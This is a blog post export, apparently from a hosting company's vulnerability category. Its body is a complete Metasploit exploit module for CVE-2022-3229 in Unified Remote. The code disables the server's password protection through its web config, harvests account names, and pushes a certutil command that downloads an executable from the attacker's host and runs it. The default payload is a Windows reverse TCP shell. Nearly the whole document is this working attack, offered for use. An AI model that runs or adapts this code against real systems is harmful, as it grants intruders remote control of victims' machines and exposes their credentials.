##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
\nRank = NormalRanking<\/p>\n
include Exploit::Remote::Tcp
\n# attempted cmdstger, however there was so much sleep involved for the screen to clear the buffer
\n# that it was going to take hours. The buffer would also overrun itself and the exploit would fail
\n# if not enough sleep time was used. it was a nightmare, not for this exploit.
\n# include Msf::Exploit::CmdStager
\ninclude Exploit::EXE # generate_payload_exe
\ninclude Msf::Exploit::Remote::HttpServer::HTML
\ninclude Msf::Exploit::FileDropper<\/p>\n
def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Unified Remote Auth Bypass to RCE’,
\n‘Description’ => %q{
\nThis module utilizes the Unified Remote remote control protocol to type out and
\ndeploy a payload. The remote control protocol can be configured to have no passwords,
\na group password, or individual user accounts. If the web page is accessible, the
\naccess control is set to no password for exploitation, then reverted.
\nIf the web page is not accessible, exploitation will be tried blindly.
\nThis module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘h00die’, # msf module
\n‘H4RK3NZ0’ # edb
\n],
\n‘References’ => [
\n[ ‘EDB’, ‘49587’ ],
\n[ ‘URL’, ‘https:\/\/www.unifiedremote.com\/’ ],
\n[ ‘URL’, ‘https:\/\/github.com\/H4rk3nz0\/PenTesting\/blob\/main\/Exploits\/unified%20remote\/unified-remote-rce.py’ ],
\n[ ‘CVE’, ‘2022-3229’ ]\n],
\n‘Arch’ => [ ARCH_X64, ARCH_X86 ],
\n‘Platform’ => ‘win’,
\n‘Stance’ => Msf::Exploit::Stance::Aggressive,
\n‘Targets’ => [
\n[‘pull’, {}],
\n],
\n‘Payload’ => {
\n‘BadChars’ => “\\x0a\\x00″
\n},
\n‘DefaultOptions’ => {
\n# since this may get typed out ON SCREEN we want as small a payload as possible
\n‘PAYLOAD’ => ‘windows\/shell\/reverse_tcp’
\n},
\n‘DisclosureDate’ => ‘2021-02-25’,
\n‘DefaultTarget’ => 0,
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘Reliability’ => [CRASH_SERVICE_DOWN],
\n‘SideEffects’ => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
\n}
\n)
\n)
\nregister_options(
\n[
\nOptPort.new(‘RPORT’, [true, ‘Port Unified Remote runs on’, 9512]),
\nOptPort.new(‘WEBSERVER’, [true, ‘Port Unified Remote web server runs on’, 9510]),
\nOptInt.new(‘SLEEP’, [true, ‘How long to sleep between commands’, 1]),
\nOptString.new(‘PATH’, [true, ‘Where to stage payload for pull method’, ‘c:\\\\Windows\\\\Temp\\\\’]),
\nOptString.new(‘CLIENTNAME’, [false, ‘Name of client, this shows up in the logs’, ”]),
\nOptBool.new(‘VISIBLE’, [false, ‘Make exploitation visible to the user’, false]),
\n]\n)
\nend<\/p>\n
def win_key
\n‘LWIN’ # 4c57494e
\nend<\/p>\n
def ret_key
\n‘RETURN’ # 52455455524e
\nend<\/p>\n
def space_key
\n‘SPACE’ # 5350414345
\nend<\/p>\n
def path
\nreturn datastore[‘PATH’] if datastore[‘PATH’].end_with? ‘\\\\’<\/p>\n
“#{datastore[‘PATH’]}\\\\”
\nend<\/p>\n
def initialize_packet
\ninitialize_packet = “\\x00\\x00\\x00\\x85\\x00\\x01\\x08”
\ninitialize_packet << “Action\\x00” # 416374696f6e 00
\ninitialize_packet << “\\x00\\x05”
\ninitialize_packet << “Password\\x00” # 50617373776f7264 00
\ninitialize_packet << ‘8e8133b3-a18b-43af-a7cd-e04f747827ce’ # 38653831333362332d613138622d343361662d613763642d653034663734373832376365 seems to be a default
\ninitialize_packet << “\\x00\\x05”
\ninitialize_packet << “Platform\\x00” # 506c6174666f726d 00
\ninitialize_packet << “android\\x00” # 616e64726f6964 00
\ninitialize_packet << “\\x08”
\ninitialize_packet << “Request\\x00” # 52657175657374 00
\ninitialize_packet << “\\x00\\x05”
\ninitialize_packet << “Source\\x00” # 536f7572636500
\n# this line shows up in logs as who connected
\ninitialize_packet << “#{@client_name}\\x00” # 616e64726f69642d64373038653134653532383463623831 00
\ninitialize_packet << “\\x03”
\ninitialize_packet << “Version\\x00” # 56657273696f6e 00
\ninitialize_packet << “\\x00\\x00\\x00\\x0a\\x00”
\nend<\/p>\n
def empty_authentication
\nempty_authentication = “\\x00\\x00\\x00\\xc8\\x00\\x01\\x08”
\nempty_authentication << “Action\\x00” # 416374696f6e 00
\nempty_authentication << “\\x01\\x02”
\nempty_authentication << “Capabilities\\x00” # 4361706162696c6974696573 00
\nempty_authentication << “\\x04”
\nempty_authentication << “Actions\\x00” # 416374696f6e73 00
\nempty_authentication << “\\x01\\x04”
\nempty_authentication << “Encryption2\\x00” # 456e6372797074696f6e32 00
\nempty_authentication << “\\x01\\x04”
\nempty_authentication << “Fast\\x00” # 46617374 00
\nempty_authentication << “\\x00\\x04”
\nempty_authentication << “Grid\\x00” # 47726964 00
\nempty_authentication << “\\x01\\x04”
\nempty_authentication << “Loading\\x00” # 4c6f6164696e6700
\nempty_authentication << “\\x01\\x04”
\nempty_authentication << “Sync\\x00” # 53796e6300
\nempty_authentication << “\\x01\\x00\\x05”
\nempty_authentication << “Password\\x00” # 50617373776f7264 00
\nempty_authentication << ‘d634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492’ # 64363334633164636664656238373335363038613461313034646564343037366465373636646436313434333631393830396164376633353835386434343932 seems to be a default
\nempty_authentication << “\\x00\\x08”
\nempty_authentication << “Request\\x00” # 52657175657374 00
\nempty_authentication << “\\x01\\x05”
\nempty_authentication << “Source\\x00” # 536f7572636500
\n# this line shows up in logs as who connected
\nempty_authentication << “#{@client_name}\\x00” # 616e64726f69642d64373038653134653532383463623831 00
\nempty_authentication << “\\x00”
\nend<\/p>\n
#############################################
\n# These methods\/packets are for visible mode
\n#############################################<\/p>\n
def string_header_one(length)
\n# 2 null, then message length takes next 2 spots
\nstring_header_one = “\\x00\\x00”
\nstring_header_one << [length].pack(‘n’).to_s
\nend<\/p>\n
def string_header_two
\nstring_header_two = “\\x00\\x01\\x08”
\nstring_header_two << “Action\\x00” # 416374696f6e 00
\nstring_header_two << “\\x07\\x05”
\nstring_header_two << “ID\\x00” # 4944 00
\nstring_header_two << “Relmtech.Keyboard\\x00” # 52656c6d746563682e4b6579626f617264 00
\nstring_header_two << “\\x02”
\nstring_header_two << “Layout\\x00” # 4c61796f7574 00
\nstring_header_two << “\\x06”
\nstring_header_two << “Controls\\x00” # 436f6e74726f6c73 00
\nstring_header_two << “\\x02\\x00\\x02”
\nstring_header_two << “OnAction\\x00” # 4f6e416374696f6e 00
\nstring_header_two << “\\x02”
\nstring_header_two << “Extras\\x00” # 457874726173 00
\nstring_header_two << “\\x06”
\nstring_header_two << “Values\\x00” # 56616c756573 00
\nstring_header_two << “\\x02\\x00\\x05”
\nstring_header_two << “Value\\x00” # 56616c7565 00
\nend<\/p>\n
def string_footer
\nstring_footer = “\\x00\\x00\\x00\\x00\\x05”
\nstring_footer << “Name\\x00” # 4e616d65 00
\nstring_footer << “toggle\\x00” # 746f67676c65 00
\nstring_footer << “\\x00\\x05”
\nstring_footer << “Source\\x00” # 536f75726365 00
\n# this line shows up in logs as who connected
\nstring_footer << “#{@client_name}\\x00” # 616e64726f69642d64373038653134653532383463623831 00
\nstring_footer << “\\x00”
\nend<\/p>\n
def send_key(key, press_return: false)
\nif key == ‘ ‘
\nkey = space_key
\nend
\ncontents = “#{string_header_two}#{key}#{string_header_three}#{key}#{string_footer}”
\ncontents = “#{string_header_one(contents.length)}#{contents}”
\nsock.put(contents)
\nif press_return
\ncontents = “#{string_header_two}#{ret_key}#{string_header_three}#{ret_key}#{string_footer}”
\ncontents = “#{string_header_one(contents.length)}#{contents}”
\nsock.put(contents)
\nend
\nend<\/p>\n
##############################################
\n# These methods\/packets are for invisible mode
\n##############################################<\/p>\n
def load_unified_command
\n# header: 00 00 00 5e
\nwait = “\\x00\\x01\\x08”
\nwait << “Action\\x00” # 416374696f6e 00
\nwait << “\\x03\\x05” # changed from the previous one from 07 to 03
\nwait << “ID\\x00” # 4944 00
\nwait << “Unified.Command\\x00” # 556e69666965642e436f6d6d616e64 00
\nwait << “\\x02”
\nwait << “Layout\\x00” # 4c61796f7574 00
\nwait << “\\x03”
\nwait << “Hash\\x00” # 48617368 00
\nwait << “\\x9e\\xd0\\x99:\\x00” # 9ed0993a 00
\nwait << “\\x08”
\nwait << “Request\\x00” # 52657175657374 00
\nwait << “\\x03\\x05” # changed from the previous one from 07 to 03
\nwait << “Source\\x00” # 536f7572636500
\nwait << “#{@client_name}\\x00”
\nwait << “\\x00”
\nend<\/p>\n
def create_script
\n# header: 00 00 00 e2
\nnew_onee = “\\x00\\x01\\x08”
\nnew_onee << “Action\\x00” # 416374696f6e 00
\nnew_onee << “\\x07\\x05”
\nnew_onee << “ID\\x00” # 4944 00
\nnew_onee << “Unified.Command\\x00” # 556e69666965642e436f6d6d616e64 00
\nnew_onee << “\\x02”
\nnew_onee << “Layout\\x00” # 4c61796f7574 00
\nnew_onee << “\\x06”
\nnew_onee << “Controls\\x00” # 436f6e74726f6c73 00
\nnew_onee << “\\x02\\x00\\x02”
\nnew_onee << “OnAction\\x00” # 4f6e416374696f6e 00
\nnew_onee << “\\x02”
\nnew_onee << “Extras\\x00” # 457874726173 00
\nnew_onee << “\\x06”
\nnew_onee << “Values\\x00” # 56616c756573 00
\nnew_onee << “\\x02\\x00\\x05”
\nnew_onee << “Key\\x00” # 4b6579 00
\nnew_onee << “Text\\x00” # 54657874 00
\nnew_onee << “\\x05”
\nnew_onee << “Value\\x00” # 56616c7565 00
\nnew_onee << “\\x00\\x00\\x00\\x00\\x05”
\nnew_onee << “Name\\x00” # 4e616d65 00
\nnew_onee << “update\\x00” # 757064617465 00
\nnew_onee << “\\x00\\x08”
\nnew_onee << “Type\\x00” # 54797065 00
\nnew_onee << “\\x08\\x00\\x00\\x00\\x08”
\nnew_onee << “Request\\x00” # 52657175657374 00
\nnew_onee << “\\x07\\x02”
\nnew_onee << “Run\\x00” # 52756e 00
\nnew_onee << “\\x02”
\nnew_onee << “Extras\\x00” # 457874726173 00
\nnew_onee << “\\x06”
\nnew_onee << “Values\\x00” # 56616c756573 00
\nnew_onee << “\\x02\\x00\\x05”
\nnew_onee << “Key\\x00” # 4b6579 00
\nnew_onee << “Text\\x00” # 54657874 00
\nnew_onee << “\\x05”
\nnew_onee << “Value\\x00” # 56616c7565 00
\nnew_onee << “\\x00\\x00\\x00\\x00\\x05”
\nnew_onee << “Name\\x00” # 4e616d65 00
\nnew_onee << “update\\x00” # 757064617465 00
\nnew_onee << “\\x00\\x05”
\nnew_onee << “Source\\x00” # 536f75726365 00
\nnew_onee << “#{@client_name}\\x00”
\nnew_onee << “\\x00”
\nend<\/p>\n
def initialize_keyboard
\n# header 00 00 00 4b
\nnew_twoo = “\\x00\\x01\\x08”
\nnew_twoo << “Action\\x00” # 416374696f6e 00
\nnew_twoo << “\\x05\\x05”
\nnew_twoo << “ID\\x00” # 4944 00
\nnew_twoo << “Unified.Command\\x00” # 556e69666965642e436f6d6d616e64 00
\nnew_twoo << “\\x08”
\nnew_twoo << “Request\\x00” # 52657175657374 00
\nnew_twoo << “\\x05\\x05”
\nnew_twoo << “Source\\x00” # 536f75726365 00
\nnew_twoo << “#{@client_name}\\x00”
\nnew_twoo << “\\x00”
\nend<\/p>\n
def add_content(command)
\n# header is dymanic based on length of command
\nnew_threee = “\\x00\\x01\\x08”
\nnew_threee << “Action\\x00” # 416374696f6e 00
\nnew_threee << “\\x07\\x05”
\nnew_threee << “ID\\x00” # 4944 00
\nnew_threee << “Unified.Command\\x00” # 556e69666965642e436f6d6d616e64 00
\nnew_threee << “\\x02”
\nnew_threee << “Layout\\x00” # 4c61796f7574 00
\nnew_threee << “\\x06”
\nnew_threee << “Controls\\x00” # 436f6e74726f6c73 00
\nnew_threee << “\\x02\\x00\\x02”
\nnew_threee << “OnAction\\x00” # 4f6e416374696f6e 00
\nnew_threee << “\\x02”
\nnew_threee << “Extras\\x00” # 457874726173 00
\nnew_threee << “\\x06”
\nnew_threee << “Values\\x00” # 56616c756573 00
\nnew_threee << “\\x02\\x00\\x05”
\nnew_threee << “Key\\x00” # 4b6579 00
\nnew_threee << “Text\\x00” # 54657874 00
\nnew_threee << “\\x05”
\nnew_threee << “Value\\x00” # 56616c7565 00
\nnew_threee << command
\nnew_threee << “\\x00\\x00\\x00\\x00\\x05”
\nnew_threee << “Name\\x00” # 4e616d65 00
\nnew_threee << “update\\x00” # 757064617465 00
\nnew_threee << “\\x00\\x08”
\nnew_threee << “Type\\x00” # 54797065 00
\nnew_threee << “\\x08\\x00\\x00\\x00\\x08”
\nnew_threee << “Request\\x00” # 52657175657374 00
\nnew_threee << “\\x07\\x02”
\nnew_threee << “Run\\x00” # 52756e 00
\nnew_threee << “\\x02”
\nnew_threee << “Extras\\x00” # 457874726173 00
\nnew_threee << “\\x06”
\nnew_threee << “Values\\x00” # 56616c756573 00
\nnew_threee << “\\x02\\x00\\x05”
\nnew_threee << “Key\\x00” # 4b6579 00
\nnew_threee << “Text\\x00” # 54657874 00
\nnew_threee << “\\x05”
\nnew_threee << “Value\\x00” # 56616c7565 00
\nnew_threee << command
\nnew_threee << “\\x00\\x00\\x00\\x00\\x05”
\nnew_threee << “Name\\x00” # 4e616d65 00
\nnew_threee << “update\\x00” # 757064617465 00
\nnew_threee << “\\x00\\x05”
\nnew_threee << “Source\\x00” # 536f75726365 00
\nnew_threee << “#{@client_name}\\x00”
\nnew_threee << “\\x00”
\nend<\/p>\n
def execute_script
\n# header 00 00 00 96
\nnew_fourr = “\\x00\\x01\\x08”
\nnew_fourr << “Action\\x00” # 416374696f6e 00
\nnew_fourr << “\\x07\\x05”
\nnew_fourr << “ID\\x00” # 4944 00
\nnew_fourr << “Unified.Command\\x00” # 556e69666965642e436f6d6d616e64 00
\nnew_fourr << “\\x02”
\nnew_fourr << “Layout\\x00” # 4c61796f7574 00
\nnew_fourr << “\\x06”
\nnew_fourr << “Controls\\x00” # 436f6e74726f6c73 00
\nnew_fourr << “\\x02\\x00\\x02”
\nnew_fourr << “OnAction\\x00” # 4f6e416374696f6e 00
\nnew_fourr << “\\x05”
\nnew_fourr << “Name\\x00” # 4e616d65 00
\nnew_fourr << “execute\\x00” # 65786563757465 00
\nnew_fourr << “\\x00\\x08”
\nnew_fourr << “Type\\x00” # 54797065 00
\nnew_fourr << “\\x08\\x00\\x00\\x00\\x08”
\nnew_fourr << “Request\\x00” # 52657175657374 00
\nnew_fourr << “\\x07\\x02”
\nnew_fourr << “Run\\x00” # 52756e 00
\nnew_fourr << “\\x05”
\nnew_fourr << “Name\\x00” # 4e616d65 00
\nnew_fourr << “execute\\x00” # 65786563757465 00
\nnew_fourr << “\\x00\\x05”
\nnew_fourr << “Source\\x00” # 536f75726365 00
\nnew_fourr << “#{@client_name}\\x00”
\nnew_fourr << “\\x00”
\nend<\/p>\n
def string_header_three
\nstring_header_three = “\\x00\\x00\\x00\\x00\\x05”
\nstring_header_three << “Name\\x00” # 4e616d65 00
\nstring_header_three << “toggle\\x00” # 746f67676c65 00
\nstring_header_three << “\\x00\\x08”
\nstring_header_three << “Type\\x00” # 54797065 00
\nstring_header_three << “\\x08\\x00\\x00\\x00\\x08”
\nstring_header_three << “Request\\x00” # 52657175657374 00
\nstring_header_three << “\\x07\\x02”
\nstring_header_three << “Run\\x00” # 52756e 00
\nstring_header_three << “\\x02”
\nstring_header_three << “Extras\\x00” # 457874726173 00
\nstring_header_three << “\\x06”
\nstring_header_three << “Values\\x00” # 56616c756573 00
\nstring_header_three << “\\x02\\x00\\x05”
\nstring_header_three << “Value\\x00” # 56616c7565 00
\nend<\/p>\n
def on_request_uri(cli, _req)
\np = generate_payload_exe
\nsend_response(cli, p)
\nprint_good(“Payload request received, sending #{p.length} bytes of payload for staging”)
\nend<\/p>\n
def restart_server
\nhttp_sock = connect(false, { ‘RPORT’ => datastore[‘WEBSERVER’].to_i })
\n# http client overrides sock, so we had to pick one… long live sock
\nrequest = “GET \/system\/restart HTTP\/1.1\\r\\n”
\nrequest << “Host: #{datastore[‘RHOST’]}:#{datastore[‘WEBSERVER’]}\\r\\n”
\nrequest << “\\r\\n”<\/p>\n
http_sock.put(request)
\ndisconnect
\nprint_status(‘Sleeping 5 seconds for server to restart’)
\nsleep(5)
\nend<\/p>\n
def set_config(config)
\nprint_status(‘Uploading new server config’)
\nhttp_sock = connect(false, { ‘RPORT’ => datastore[‘WEBSERVER’].to_i })
\n# http client overrides sock, so we had to pick one… long live sock
\nrequest = “POST \/system\/config HTTP\/1.1\\r\\n”
\nrequest << “Host: #{datastore[‘RHOST’]}:#{datastore[‘WEBSERVER’]}\\r\\n”
\nrequest << “Accept: application\/json, text\/javascript, *\/*; q=0.01\\r\\n”
\nrequest << “Content-Type: application\/json\\r\\n”
\nrequest << “X-Requested-With: XMLHttpRequest\\r\\n”
\nrequest << “Content-Length: #{config.to_json.length}\\r\\n”
\nrequest << “\\r\\n”
\nrequest << config.to_json<\/p>\n
http_sock.put(request)
\nbegin
\nhttp_sock.get_once(-1)
\nrescue EOFError
\nreturn nil
\nend<\/p>\n
disconnect
\nrestart_server
\nend<\/p>\n
def get_config
\nprint_status(‘Retrieving server config’)
\nhttp_sock = connect(false, { ‘RPORT’ => datastore[‘WEBSERVER’].to_i })
\n# http client overrides sock, so we had to pick one… long live sock
\nrequest = “GET \/system\/config HTTP\/1.1\\r\\n”
\nrequest << “Host: #{datastore[‘RHOST’]}:#{datastore[‘WEBSERVER’]}\\r\\n”
\nrequest << “\\r\\n”<\/p>\n
http_sock.put(request)
\nbegin
\nres = http_sock.get_once(-1)
\nrescue EOFError
\nreturn nil
\nend
\ndisconnect
\nbody = res.split(“\\r\\n\\r\\n”)[1]\nif body.include?(‘<h1>Forbidden (403)<\/h1>’)
\nprint_error(‘Web interface is disabled. Unable to attempt bypass, assuming no authentication.’)
\nreturn nil
\nelse
\n# transient error where the JSON doesn’t fully receive maybe 1\/15 tries in my testing
\nbegin
\nreturn JSON.parse(body) # split between headers and body
\nrescue JSON::ParserError
\nreturn nil
\nend
\nend
\nend<\/p>\n
def report_cred(opts)
\nservice_data = {
\naddress: opts[:ip],
\nport: opts[:port],
\nservice_name: opts[:service_name],
\nprotocol: ‘tcp’,
\nworkspace_id: myworkspace_id
\n}<\/p>\n
credential_data = {
\norigin_type: :service,
\nmodule_fullname: fullname,
\nusername: opts[:user],
\nprivate_data: opts[:password],
\nprivate_type: :password
\n}.merge(service_data)<\/p>\n
login_data = {
\ncore: create_credential(credential_data),
\nstatus: Metasploit::Model::Login::Status::SUCCESSFUL,
\nlast_attempted_at: DateTime.now,
\nproof: opts[:proof]\n}.merge(service_data)<\/p>\n
create_credential_login(login_data)
\nend<\/p>\n
def check
\nsecurity_mode = get_config
\nif security_mode.nil?
\nreturn CheckCode::Unknown(‘Unable to get config from web server, unknown status of Unified Remote Controller’)
\nend<\/p>\n
CheckCode::Vulnerable(“Unified Remote is vulnerable on port #{security_mode[‘interfaces’][‘tcp’][‘port’]} with security mode ‘#{security_mode[‘security’][‘mode’]}’ (can be bypassed, if needed)”)
\nend<\/p>\n
def exploit
\nif datastore[‘CLIENTNAME’].blank?
\n@client_name = “android-#{Rex::Text.rand_text_alphanumeric(16)}”
\nprint_status(“Client name set to: #{@client_name}”)
\nelse
\n@client_name = datastore[‘CLIENTNAME’]\nend
\n# first grab the config from the HTTP server to determine if we need to disable auth
\nsecurity_mode = get_config
\nreset_security_mode = nil
\nunless security_mode.nil?
\nif security_mode[‘security’][‘mode’] == ‘none’
\nprint_good(‘No security enabled’)
\nelse
\nprint_status(“#{security_mode[‘security’][‘mode’]} mode enabled, password required, bypassing”)
\nreset_security_mode = security_mode[‘security’][‘mode’]\nsecurity_mode[‘security’][‘mode’] = ‘none’
\nset_config(security_mode)
\nend
\n# now that we have the config, check if theres any users, no passwords (theyre GUIDs)
\nsecurity_mode[‘security’][‘users’].each do |account|
\nprint_good(“Found account: #{account[‘username’]}”)
\nreport_cred(
\nip: rhost,
\nport: rport,
\nservice_name: ‘wifi mouse’,
\nuser: account[‘username’],
\npassword: ”,
\nproof: account
\n)
\nend
\nend<\/p>\n
# start actually exploiting the rdp-ish server
\nconnect
\nprint_status(‘Sending handshake’)
\nsock.put(initialize_packet)
\nsleep(datastore[‘SLEEP’])
\nprint_status(‘Sending empty authentication’)
\nsock.put(empty_authentication)
\nsleep(datastore[‘SLEEP’])<\/p>\n
filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + ‘.exe’
\nregister_file_for_cleanup(“#{path}#{filename}”)
\n# this method was in the original edb exploit, this is significantly faster
\n# and speed is of the essence since remote user input most likely breaks this module
\nstager = “certutil.exe -urlcache -f http:\/\/#{datastore[‘lhost’]}:#{datastore[‘SRVPORT’]}\/ #{path}#{filename}”
\nstart_service(‘Path’ => ‘\/’) # start webserver<\/p>\n
if datastore[‘VISIBLE’]\nprint_status(‘Opening Start Menu’)
\n# original exploit sent it twice, so we follow that
\nsend_key(win_key)
\nsend_key(win_key)
\nsleep(datastore[‘SLEEP’])<\/p>\n
print_status(‘Opening command prompt’)
\n‘cmd.exe’.each_char do |letter|
\nsend_key(letter)
\nend
\nsend_key(ret_key)
\nsleep(datastore[‘SLEEP’])<\/p>\n
print_status(‘Typing out payload’)
\nstager.each_char do |letter|
\nsend_key(letter)
\nend
\nsend_key(ret_key)
\nsleep(datastore[‘SLEEP’] * 2) # give time for it to save<\/p>\n
print_status(‘Attempting to open payload’)
\n“#{path}#{filename} && exit”.each_char do |letter|
\nsend_key(letter)
\nend
\nsend_key(ret_key)
\nelse
\nstager << ” && #{path}#{filename} && exit”
\nprint_status(‘Loading Unified.Command’)
\ncontents = load_unified_command
\nsock.put(“#{string_header_one(contents.length)}#{contents}”)
\nsleep(datastore[‘SLEEP’])<\/p>\n
print_status(‘Updating Unified.Command’)
\ncontents = create_script
\nsock.put(“#{string_header_one(contents.length)}#{contents}”)
\nsleep(datastore[‘SLEEP’])<\/p>\n
contents = initialize_keyboard
\nsock.put(“#{string_header_one(contents.length)}#{contents}”)
\nsleep(datastore[‘SLEEP’])<\/p>\n
print_status(‘Sending payload’)
\ncontents = add_content(stager)
\nsock.put(“#{string_header_one(contents.length)}#{contents}”)
\nsleep(datastore[‘SLEEP’])<\/p>\n
print_status(‘Executing script’)
\ncontents = execute_script
\nsock.put(“#{string_header_one(contents.length)}#{contents}”)
\nsleep(datastore[‘SLEEP’])<\/p>\n
contents = create_script
\nsock.put(“#{string_header_one(contents.length)}#{contents}”)
\nsleep(datastore[‘SLEEP’])
\nend<\/p>\n
handler
\ndisconnect
\nsleep(datastore[‘SLEEP’] * 2) # give time for it to do its thing before we revert<\/p>\n
# lastly some cleanup
\nunless reset_security_mode.nil?
\nprint_status(‘Reverting security mode’)
\nsecurity_mode[‘security’][‘mode’] = reset_security_mode
\nset_config(security_mode)
\nend
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"
## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp # attempted cmdstger, however there was so much sleep involved for the screen to clear the buffer # that it was going to take hours. The buffer would also overrun itself and the exploit …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-30994","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30994","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=30994"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30994\/revisions"}],"predecessor-version":[{"id":31335,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30994\/revisions\/31335"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=30994"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=30994"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=30994"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}